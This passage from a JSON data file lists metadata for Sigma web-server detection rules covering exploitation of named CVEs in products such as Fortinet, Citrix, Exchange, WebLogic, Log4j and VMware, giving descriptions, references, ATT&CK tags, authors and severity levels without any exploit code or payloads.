"Unknown" - ], - "logsource.category": "webserver", - "logsource.product": "No established product" - } - }, - { - "description": "Detects CVE-2018-13379 exploitation attempt against Fortinet SSL VPNs", - "uuid": "a2e97350-4285-43f2-a63f-d0daff291738", - 
"value": "Fortinet CVE-2018-13379 Exploitation", - "meta": { - "refs": [ - "https://devco.re/blog/2019/08/09/attacking-ssl-vpn-part-2-breaking-the-Fortigate-ssl-vpn/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2018_13379_fortinet_preauth_read_exploit.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ], - "creation_date": "2020/12/08", - "filename": "web_cve_2018_13379_fortinet_preauth_read_exploit.yml", - "author": "Bhabesh Raj", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "webserver", - "logsource.product": "No established product" - } - }, - { - "description": "Detects access to a webshell dropped into a keystore folder on the WebLogic server", - "uuid": "37e8369b-43bb-4bf8-83b6-6dd43bda2000", - "value": "Oracle WebLogic Exploit", - "meta": { - "refs": [ - "https://twitter.com/pyn3rd/status/1020620932967223296", - "https://github.com/LandGrey/CVE-2018-2894", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2018_2894_weblogic_exploit.yml" - ], - "tags": [ - "attack.t1190", - "attack.initial_access", - "attack.persistence", - "attack.t1505.003", - "cve.2018.2894" - ], - "creation_date": "2018/07/22", - "filename": "web_cve_2018_2894_weblogic_exploit.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "webserver", - "logsource.product": "No established product" - } - }, - { - "description": "Detects CVE-2019-11510 exploitation attempt - URI contains Guacamole", - "uuid": "2dbc10d7-a797-49a8-8776-49efa6442e60", - "value": "Pulse Secure Attack CVE-2019-11510", - "meta": { - "refs": [ - "https://www.exploit-db.com/exploits/47297", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2019_11510_pulsesecure_exploit.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ], - "creation_date": "2019/11/18", - "filename": "web_cve_2019_11510_pulsesecure_exploit.yml", - "author": 
"Florian Roth",
- "level": "critical",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "webserver",
- "logsource.product": "No established product"
- }
- },
- {
- "description": "Detects CVE-2019-19781 exploitation attempt against Citrix Netscaler, Application Delivery Controller and Citrix Gateway Attack",
- "uuid": "ac5a6409-8c89-44c2-8d64-668c29a2d756",
- "value": "Citrix Netscaler Attack CVE-2019-19781",
- "meta": {
- "refs": [
- "https://support.citrix.com/article/CTX267679",
- "https://support.citrix.com/article/CTX267027",
- "https://isc.sans.edu/diary/25686",
- "https://twitter.com/mpgn_x64/status/1216787131210829826",
- "https://github.com/x1sec/CVE-2019-19781/blob/25f7ab97275b2d41800bb3414dac8ca3a78af7e5/CVE-2019-19781-DFIR.md",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2019_19781_citrix_exploit.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190"
- ],
- "creation_date": "2020/01/02",
- "filename": "web_cve_2019_19781_citrix_exploit.yml",
- "author": "Arnim Rupp, Florian Roth",
- "level": "critical",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "webserver",
- "logsource.product": "No established product"
- }
- },
- {
- "description": "Detects the exploitation of the Confluence vulnerability described in CVE-2019-3398",
- "uuid": "e9bc39ae-978a-4e49-91ab-5bd481fc668b",
- "value": "Confluence Exploitation CVE-2019-3398",
- "meta": {
- "refs": [
- "https://devcentral.f5.com/s/articles/confluence-arbitrary-file-write-via-path-traversal-cve-2019-3398-34181",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2019_3398_confluence.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190"
- ],
- "creation_date": "2020/05/26",
- "filename": "web_cve_2019_3398_confluence.yml",
- "author": "Florian Roth",
- "level": "critical",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "webserver",
- "logsource.product": "No established product"
- }
- },
- {
- "description": "Detects CVE-2020-0688 Exploitation attempts",
- "uuid": "7c64e577-d72e-4c3d-9d75-8de6d1f9146a",
- "value": "CVE-2020-0688 Exploitation Attempt",
- "meta": {
- "refs": [
- "https://github.com/Ridter/cve-2020-0688",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_0688_exchange_exploit.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190"
- ],
- "creation_date": "2020/02/27",
- "filename": "web_cve_2020_0688_exchange_exploit.yml",
- "author": "NVISO",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "webserver",
- "logsource.product": "No established product"
- }
- },
- {
- "description": "Detects the exploitation of Microsoft Exchange vulnerability as described in CVE-2020-0688",
- "uuid": "fce2c2e2-0fb5-41ab-a14c-5391e1fd70a5",
- "value": "CVE-2020-0688 Exchange Exploitation via Web Log",
- "meta": {
- "refs": [
- "https://www.trustedsec.com/blog/detecting-cve-20200688-remote-code-execution-vulnerability-on-microsoft-exchange-server/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_0688_msexchange.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190"
- ],
- "creation_date": "2020/02/29",
- "filename": "web_cve_2020_0688_msexchange.yml",
- "author": "Florian Roth",
- "level": "critical",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "webserver",
- "logsource.product": "No established product"
- }
- },
- {
- "description": "Detects CVE-2020-10148 SolarWinds Orion API authentication bypass attempts",
- "uuid": "5a35116f-43bc-4901-b62d-ef131f42a9af",
- "value": "CVE-2020-10148 SolarWinds Orion API Auth Bypass",
- "meta": {
- "refs": [
- "https://kb.cert.org/vuls/id/843464",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_10148_solarwinds_exploit.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190"
- ],
- "creation_date": "2020/12/27",
- "filename": "web_cve_2020_10148_solarwinds_exploit.yml",
- "author": "Bhabesh Raj, Tim Shelton",
- "level": "critical",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "webserver",
- "logsource.product": "No established product"
- }
- },
- {
- "description": "Detects exploitation attempts on WebLogic servers",
- "uuid": "85d466b0-d74c-4514-84d3-2bdd3327588b",
- "value": "Oracle WebLogic Exploit CVE-2020-14882",
- "meta": {
- "refs": [
- "https://isc.sans.edu/diary/26734",
- "https://twitter.com/jas502n/status/1321416053050667009?s=20",
- "https://twitter.com/sudo_sudoka/status/1323951871078223874",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_14882_weblogic_exploit.yml"
- ],
- "tags": [
- "attack.t1190",
- "attack.initial_access",
- "cve.2020.14882"
- ],
- "creation_date": "2020/11/02",
- "filename": "web_cve_2020_14882_weblogic_exploit.yml",
- "author": "Florian Roth",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "webserver",
- "logsource.product": "No established product"
- }
- },
- {
- "description": "Detects the exploitation of the TerraMaster TOS vulnerability described in CVE-2020-28188",
- "uuid": "15c312b9-00d0-4feb-8870-7d940a4bdc5e",
- "value": "TerraMaster TOS CVE-2020-28188",
- "meta": {
- "refs": [
- "https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/",
- "https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_28188_terramaster_rce_exploit.yml"
- ],
- "tags": [
- "attack.t1190",
- "attack.initial_access",
- "cve.2020.28188"
- ],
- "creation_date": "2021/01/25",
- "filename": "web_cve_2020_28188_terramaster_rce_exploit.yml",
- "author": "Bhabesh Raj",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "webserver",
- "logsource.product": "No established product"
- }
- },
- {
- "description": "Detects exploitation attempts on Cisco ASA FTD systems exploiting CVE-2020-3452 with a status code of 200 (sccessful exploitation)",
- "uuid": "aba47adc-4847-4970-95c1-61dce62a8b29",
- "value": "Cisco ASA FTD Exploit CVE-2020-3452",
- "meta": {
- "refs": [
- "https://twitter.com/aboul3la/status/1286012324722155525",
- "https://github.com/darklotuskdb/CISCO-CVE-2020-3452-Scanner-Exploiter",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_3452_cisco_asa_ftd.yml"
- ],
- "tags": [
- "attack.t1190",
- "attack.initial_access",
- "cve.2020.3452"
- ],
- "creation_date": "2021/01/07",
- "filename": "web_cve_2020_3452_cisco_asa_ftd.yml",
- "author": "Florian Roth",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "webserver",
- "logsource.product": "No established product"
- }
- },
- {
- "description": "Detects the exploitation attempt of the vulnerability found in F5 BIG-IP and described in CVE-2020-5902",
- "uuid": "44b53b1c-e60f-4a7b-948e-3435a7918478",
- "value": "CVE-2020-5902 F5 BIG-IP Exploitation Attempt",
- "meta": {
- "refs": [
- "https://support.f5.com/csp/article/K52145254",
- "https://www.ptsecurity.com/ww-en/about/news/f5-fixes-critical-vulnerability-discovered-by-positive-technologies-in-big-ip-application-delivery-controller/",
- "https://twitter.com/yorickkoster/status/1279709009151434754",
- "https://www.criticalstart.com/f5-big-ip-remote-code-execution-exploit/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_5902_f5_bigip.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190"
- ],
- "creation_date": "2020/07/05",
- "filename": "web_cve_2020_5902_f5_bigip.yml",
- "author": "Florian Roth",
- "level": "critical",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "webserver",
- "logsource.product": "No established product"
- }
- },
- {
- "description": "Detects exploitation attempt against Citrix Netscaler, Application Delivery Controller (ADS) and Citrix Gateway exploiting vulnerabilities reported as CVE-2020-8193 and CVE-2020-8195",
- "uuid": "0d0d9a8a-a49e-4e27-b061-7ce4b936cfb7",
- "value": "Citrix ADS Exploitation CVE-2020-8193 CVE-2020-8195",
- "meta": {
- "refs": [
- "https://support.citrix.com/article/CTX276688",
- "https://research.nccgroup.com/2020/07/10/rift-citrix-adc-vulnerabilities-cve-2020-8193-cve-2020-8195-and-cve-2020-8196-intelligence/",
- "https://dmaasland.github.io/posts/citrix.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_8193_8195_citrix_exploit.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190"
- ],
- "creation_date": "2020/07/10",
- "filename": "web_cve_2020_8193_8195_citrix_exploit.yml",
- "author": "Florian Roth",
- "level": "critical",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "webserver",
- "logsource.product": "No established product"
- }
- },
- {
- "description": "Detects exploitation of vulnerabilities in Arcadyan routers as reported in CVE-2021-20090 and CVE-2021-20091.",
- "uuid": "f0500377-bc70-425d-ac8c-e956cd906871",
- "value": "Arcadyan Router Exploitations",
- "meta": {
- "refs": [
- "https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2",
- "https://www.tenable.com/security/research/tra-2021-13",
- "https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_20090_2021_20091_arcadyan_router_exploit.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190",
- "cve.2021.20090",
- "cve.2021.20091"
- ],
- "creation_date": "2021/08/24",
- "filename": "web_cve_2021_20090_2021_20091_arcadyan_router_exploit.yml",
- "author": "Bhabesh Raj",
- "level": "critical",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "webserver",
- "logsource.product": "No established product"
- }
- },
- {
- "description": "Detects the exploitation of the WebLogic server vulnerability described in CVE-2021-2109",
- "uuid": "687f6504-7f44-4549-91fc-f07bab065821",
- "value": "Oracle WebLogic Exploit CVE-2021-2109",
- "meta": {
- "refs": [
- "https://twitter.com/pyn3rd/status/1351696768065409026",
- "https://mp.weixin.qq.com/s/wX9TMXl1KVWwB_k6EZOklw",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_2109_weblogic_rce_exploit.yml"
- ],
- "tags": [
- "attack.t1190",
- "attack.initial_access",
- "cve.2021.2109"
- ],
- "creation_date": "2021/01/20",
- "filename": "web_cve_2021_2109_weblogic_rce_exploit.yml",
- "author": "Bhabesh Raj",
- "level": "critical",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "webserver",
- "logsource.product": "No established product"
- }
- },
- {
- "description": "Detects the exploitation of VSphere Remote Code Execution vulnerability as described in CVE-2021-21972",
- "uuid": "179ed852-0f9b-4009-93a7-68475910fd86",
- "value": "CVE-2021-21972 VSphere Exploitation",
- "meta": {
- "refs": [
- "https://www.vmware.com/security/advisories/VMSA-2021-0002.html",
- "https://f5.pm/go-59627.html",
- "https://swarm.ptsecurity.com/unauth-rce-vmware",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_21972_vsphere_unauth_rce_exploit.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190"
- ],
- "creation_date": "2021/02/24",
- "filename": "web_cve_2021_21972_vsphere_unauth_rce_exploit.yml",
- "author": "Bhabesh Raj",
- "level": "high",
- "falsepositive": [
- "OVA uploads to your VSphere appliance"
- ],
- "logsource.category": "webserver",
- "logsource.product": "No established product"
- }
- },
- {
- "description": "Detects the exploitation of the VMware View Planner vulnerability described in CVE-2021-21978",
- "uuid": "77586a7f-7ea4-4c41-b19c-820140b84ca9",
- "value": "CVE-2021-21978 Exploitation Attempt",
- "meta": {
- "refs": [
- "https://twitter.com/wugeej/status/1369476795255320580",
- "https://paper.seebug.org/1495/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_21978_vmware_view_planner_exploit.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190",
- "cve.2021.21978"
- ],
- "creation_date": "2020/03/10",
- "filename": "web_cve_2021_21978_vmware_view_planner_exploit.yml",
- "author": "Bhabesh Raj",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "webserver",
- "logsource.product": "No established product"
- }
- },
- {
- "description": "Detects exploitation attempts using file upload vulnerability CVE-2021-22005 in the VMWare vCenter Server.",
- "uuid": "b014ea07-8ea0-4859-b517-50a4e5b7ecec",
- "value": "VMware vCenter Server File Upload CVE-2021-22005",
- "meta": {
- "refs": [
- "https://kb.vmware.com/s/article/85717",
- "https://www.tenable.com/blog/cve-2021-22005-critical-file-upload-vulnerability-in-vmware-vcenter-server",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_22005_vmware_file_upload.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190"
- ],
- "creation_date": "2021/09/24",
- "filename": "web_cve_2021_22005_vmware_file_upload.yml",
- "author": "Sittikorn S",
- "level": "high",
- "falsepositive": [
- "Vulnerability Scanning"
- ],
- "logsource.category": "webserver",
- "logsource.product": "No established product"
- }
- },
- {
- "description": "Detects CVE-2021-22123 exploitation attempt against Fortinet WAFs",
- "uuid": "f425637f-891c-4191-a6c4-3bb1b70513b4",
- "value": "Fortinet CVE-2021-22123 Exploitation",
- "meta": {
- "refs": [
- "https://www.rapid7.com/blog/post/2021/08/17/fortinet-fortiweb-os-command-injection",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_22123_fortinet_exploit.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190"
- ],
- "creation_date": "2021/08/19",
- "filename": "web_cve_2021_22123_fortinet_exploit.yml",
- "author": "Bhabesh Raj, Florian Roth",
- "level": "critical",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "webserver",
- "logsource.product": "No established product"
- }
- },
- {
- "description": "This rule detects exploitation attempts using Pulse Connect Secure(PCS) vulnerability (CVE-2021-22893)",
- "uuid": "5525edac-f599-4bfd-b926-3fa69860e766",
- "value": "Pulse Connect Secure RCE Attack CVE-2021-22893",
- "meta": {
- "refs": [
- "https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html",
- "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_22893_pulse_secure_rce_exploit.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190"
- ],
- "creation_date": "2021/06/29",
- "filename": "web_cve_2021_22893_pulse_secure_rce_exploit.yml",
- "author": "Sittikorn S",
- "level": "high",
- "falsepositive": [
- "Vulnerability Scanning"
- ],
- "logsource.category": "webserver",
- "logsource.product": "No established product"
- }
- },
- {
- "description": "Detects the exploitation of the Wazuh RCE vulnerability described in CVE-2021-26814",
- "uuid": "b9888738-29ed-4c54-96a4-f38c57b84bb3",
- "value": "Exploitation of CVE-2021-26814 in Wazuh",
- "meta": {
- "refs": [
- "https://github.com/WickdDavid/CVE-2021-26814/blob/6a17355a10ec4db771d0f112cbe031e418d829d5/PoC.py",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_26814_wzuh_rce.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190",
- "cve.2021.21978",
- "cve.2021.26814"
- ],
- "creation_date": "2021/05/22",
- "filename": "web_cve_2021_26814_wzuh_rce.yml",
- "author": "Florian Roth",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "webserver",
- "logsource.product": "No established product"
- }
- },
- {
- "description": "When exploiting this vulnerability with CVE-2021-26858, an SSRF attack is used to manipulate virtual directories",
- "uuid": "effee1f6-a932-4297-a81f-acb44064fa3a",
- "value": "ProxyLogon Reset Virtual Directories Based On IIS Log",
- "meta": {
- "refs": [
- "https://bi-zone.medium.com/hunting-down-ms-exchange-attacks-part-1-proxylogon-cve-2021-26855-26858-27065-26857-6e885c5f197c",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_26858_iis_rce.yml"
- ],
- "tags": "No established tags",
- "creation_date": "2021/08/10",
- "filename": "web_cve_2021_26858_iis_rce.yml",
- "author": "frack113",
- "level": "critical",
- "falsepositive": [
- "Unlikely"
- ],
- "logsource.category": "webserver",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects successful exploitation of Exchange vulnerability as reported in CVE-2021-28480",
- "uuid": "a2a9d722-0acb-4096-bccc-daaf91a5037b",
- "value": "Exchange Exploitation CVE-2021-28480",
- "meta": {
- "refs": [
- "https://twitter.com/GossiTheDog/status/1392965209132871683?s=20",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_28480_exchange_exploit.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190"
- ],
- "creation_date": "2021/05/14",
- "filename": "web_cve_2021_28480_exchange_exploit.yml",
- "author": "Florian Roth",
- "level": "critical",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "webserver",
- "logsource.product": "No established product"
- }
- },
- {
- "description": "Detects the exploitation of Microsoft Exchange ProxyToken vulnerability as described in CVE-2021-33766",
- "uuid": "56973b50-3382-4b56-bdf5-f51a3183797a",
- "value": "CVE-2021-33766 Exchange ProxyToken Exploitation",
- "meta": {
- "refs": [
- "https://www.zerodayinitiative.com/blog/2021/8/30/proxytoken-an-authentication-bypass-in-microsoft-exchange-server",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_33766_msexchange_proxytoken.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190"
- ],
- "creation_date": "2021/08/30",
- "filename": "web_cve_2021_33766_msexchange_proxytoken.yml",
- "author": "Florian Roth, Max Altgelt, Christian Burkard",
- "level": "critical",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "webserver",
- "logsource.product": "No established product"
- }
- },
- {
- "description": "Detects suspicious access to URLs that was noticed in cases in which attackers exploitated the ADSelfService vulnerability CVE-2021-40539",
- "uuid": "6702b13c-e421-44cc-ab33-42cc25570f11",
- "value": "ADSelfService Exploitation",
- "meta": {
- "refs": [
- "https://us-cert.cisa.gov/ncas/alerts/aa21-259a",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_40539_adselfservice.yml"
- ],
- "tags": "No established tags",
- "creation_date": "2021/09/20",
- "filename": "web_cve_2021_40539_adselfservice.yml",
- "author": "Tobias Michalski, Max Altgelt",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "webserver",
- "logsource.product": "No established product"
- }
- },
- {
- "description": "Detects an authentication bypass vulnerability affecting the REST API URLs in ADSelfService Plus (CVE-2021-40539).",
- "uuid": "fcbb4a77-f368-4945-b046-4499a1da69d1",
- "value": "CVE-2021-40539 Zoho ManageEngine ADSelfService Plus Exploit",
- "meta": {
- "refs": [
- "https://therecord.media/cisa-warns-of-zoho-server-zero-day-exploited-in-the-wild/",
- "https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html",
- "https://us-cert.cisa.gov/ncas/alerts/aa21-259a",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_40539_manageengine_adselfservice_exploit.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190",
- "attack.persistence",
- "attack.t1505.003"
- ],
- "creation_date": "2021/09/10",
- "filename": "web_cve_2021_40539_manageengine_adselfservice_exploit.yml",
- "author": "Sittikorn S, Nuttakorn Tungpoonsup",
- "level": "critical",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "webserver",
- "logsource.product": "No established product"
- }
- },
- {
- "description": "Detects exploitation of flaw in path normalization in Apache HTTP server 2.4.49.\nAn attacker could use a path traversal attack to map URLs to files outside the expected document root.\nIf files outside of the document root are not protected by \"require all denied\" these requests can succeed.\nAdditionally this flaw could leak the source of interpreted files like CGI scripts.\nThis issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.\n",
- "uuid": "3007fec6-e761-4319-91af-e32e20ac43f5",
- "value": "CVE-2021-41773 Exploitation Attempt",
- "meta": {
- "refs": [
- "https://nvd.nist.gov/vuln/detail/CVE-2021-41773",
- "https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782",
- "https://twitter.com/ptswarm/status/1445376079548624899",
- "https://twitter.com/h4x0r_dz/status/1445401960371429381",
- "https://github.com/projectdiscovery/nuclei-templates/blob/9d2889356eebba661c8407038e430759dfd4ec31/cves/2021/CVE-2021-41773.yaml",
- "https://twitter.com/bl4sty/status/1445462677824761878",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_41773_apache_path_traversal.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190"
- ],
- "creation_date": "2021/10/05",
- "filename": "web_cve_2021_41773_apache_path_traversal.yml",
- "author": "daffainfo, Florian Roth",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "webserver",
- "logsource.product": "No established product"
- }
- },
- {
- "description": "Detects exploitation attempts of Sitecore Experience Platform Pre-Auth RCE CVE-2021-42237 found in Report.ashx",
- "uuid": "20c6ed1c-f7f0-4ea3-aa65-4f198e6acb0f",
- "value": "Sitecore Pre-Auth RCE CVE-2021-42237",
- "meta": {
- "refs": [
- "https://blog.assetnote.io/2021/11/02/sitecore-rce/",
- "https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1000776",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_42237_sitecore_report_ashx.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190"
- ],
- "creation_date": "2021/11/17",
- "filename": "web_cve_2021_42237_sitecore_report_ashx.yml",
- "author": "Florian Roth",
- "level": "high",
- "falsepositive": [
- "Vulnerability Scanning"
- ],
- "logsource.category": "webserver",
- "logsource.product": "No established product"
- }
- },
- {
- "description": "Detects a successful Grafana path traversal exploitation",
- "uuid": "7b72b328-5708-414f-9a2a-6a6867c26e16",
- "value": "Grafana Path Traversal Exploitation CVE-2021-43798",
- "meta": {
- "refs": [
- "https://grafana.com/blog/2021/12/07/grafana-8.3.1-8.2.7-8.1.8-and-8.0.7-released-with-high-severity-security-fix/",
- "https://github.com/search?q=CVE-2021-43798",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_43798_grafana.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190"
- ],
- "creation_date": "2021/12/08",
- "filename": "web_cve_2021_43798_grafana.yml",
- "author": "Florian Roth",
- "level": "critical",
- "falsepositive": [
- "Vulnerability scanners that scan a host that returns 200 status codes even in cases of a file not found or other error"
- ],
- "logsource.category": "webserver",
- "logsource.product": "No established product"
- }
- },
- {
- "description": "Detects exploitation attempt against log4j RCE vulnerability reported as CVE-2021-44228 (Log4Shell)",
- "uuid": "5ea8faa8-db8b-45be-89b0-151b84c82702",
- "value": "Log4j RCE CVE-2021-44228 Generic",
- "meta": {
- "refs": [
- "https://www.lunasec.io/docs/blog/log4j-zero-day/",
- "https://news.ycombinator.com/item?id=29504755",
- "https://github.com/tangxiaofeng7/apache-log4j-poc",
- "https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b",
- "https://github.com/YfryTchsGD/Log4jAttackSurface",
- "https://twitter.com/shutingrz/status/1469255861394866177?s=21",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_44228_log4j.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190"
- ],
- "creation_date": "2021/12/10",
- "filename": "web_cve_2021_44228_log4j.yml",
- "author": "Florian Roth",
- "level": "high",
- "falsepositive": [
- "Vulnerability scanning"
- ],
- "logsource.category": "webserver",
- "logsource.product": "No established product"
- }
- },
- {
- "description": "Detects exploitation attempt against log4j RCE vulnerability reported as CVE-2021-44228 in different header fields found in web server logs (Log4Shell)",
- "uuid": "9be472ed-893c-4ec0-94da-312d2765f654",
- "value": "Log4j RCE CVE-2021-44228 in Fields",
- "meta": {
- "refs": [
- "https://www.lunasec.io/docs/blog/log4j-zero-day/",
- "https://news.ycombinator.com/item?id=29504755",
- "https://github.com/tangxiaofeng7/apache-log4j-poc",
- "https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b",
- "https://github.com/YfryTchsGD/Log4jAttackSurface",
- "https://twitter.com/shutingrz/status/1469255861394866177?s=21",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_44228_log4j_fields.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190"
- ],
- "creation_date": "2021/12/10",
- "filename": "web_cve_2021_44228_log4j_fields.yml",
- "author": "Florian Roth",
- "level": "high",
- "falsepositive": [
- "Vulnerability scanning"
- ],
- "logsource.category": "webserver",
- "logsource.product": "No established product"
- }
- },
- {
- "description": "Detects an attempt to leverage the vulnerable servlet \"mboximport\" for an unauthenticated remote command injection",
- "uuid": "dd218fb6-4d02-42dc-85f0-a0a376072efd",
- "value": "Zimbra Collaboration Suite Email Server Unauthenticated RCE",
- "meta": {
- "refs": [
- "https://www.volexity.com/blog/2022/08/10/mass-exploitation-of-unauthenticated-zimbra-rce-cve-2022-27925/",
- "https://www.yang99.top/index.php/archives/82/",
- "https://github.com/vnhacker1337/CVE-2022-27925-PoC",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2022_27925_exploit.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190",
- "cve.2022.27925"
- ],
- "creation_date": "2022/08/17",
- "filename": "web_cve_2022_27925_exploit.yml",
- "author": "@gott_cyber",
- "level": "medium",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "webserver",
- "logsource.product": "No established product"
- }
- },
- {
- "description": "Detects the exploitation of VMware Workspace ONE Access Authentication Bypass vulnerability as described in CVE-2022-31656\nVMware Workspace ONE Access, Identity Manager and vRealize Automation contain an authentication bypass vulnerability affecting local domain users.\nA malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate.\n",
- "uuid": "fcf1101d-07c9-49b2-ad81-7e421ff96d80",
- "value": "CVE-2022-31656 VMware Workspace ONE Access Auth Bypass",
- "meta": {
- "refs": [
- "https://petrusviet.medium.com/dancing-on-the-architecture-of-vmware-workspace-one-access-eng-ad592ae1b6dd",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2022_31656_auth_bypass.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190"
- ],
- "creation_date": "2022/08/12",
- "filename": "web_cve_2022_31656_auth_bypass.yml",
- "author": "Nasreddine Bencherchali",
- "level": "high",
- "falsepositive": [
- "Vulnerability scanners"
- ],
- "logsource.category": "webserver",
- "logsource.product": "No established product"
- }
- },
- {
- "description": "Detects possible exploitation of VMware Workspace ONE Access Admin Remote Code Execution vulnerability as described in CVE-2022-31659",
- "uuid": "efdb2003-a922-48aa-8f37-8b80021a9706",
- "value": "CVE-2022-31659 VMware Workspace ONE Access RCE",
- "meta": {
- "refs": [
- "https://petrusviet.medium.com/dancing-on-the-architecture-of-vmware-workspace-one-access-eng-ad592ae1b6dd",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2022_31659_vmware_rce.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190"
- ],
- "creation_date": "2022/08/12",
- "filename": "web_cve_2022_31659_vmware_rce.yml",
- "author": "Nasreddine Bencherchali",
- "level": "medium",
- "falsepositive": [
- "Vulnerability scanners",
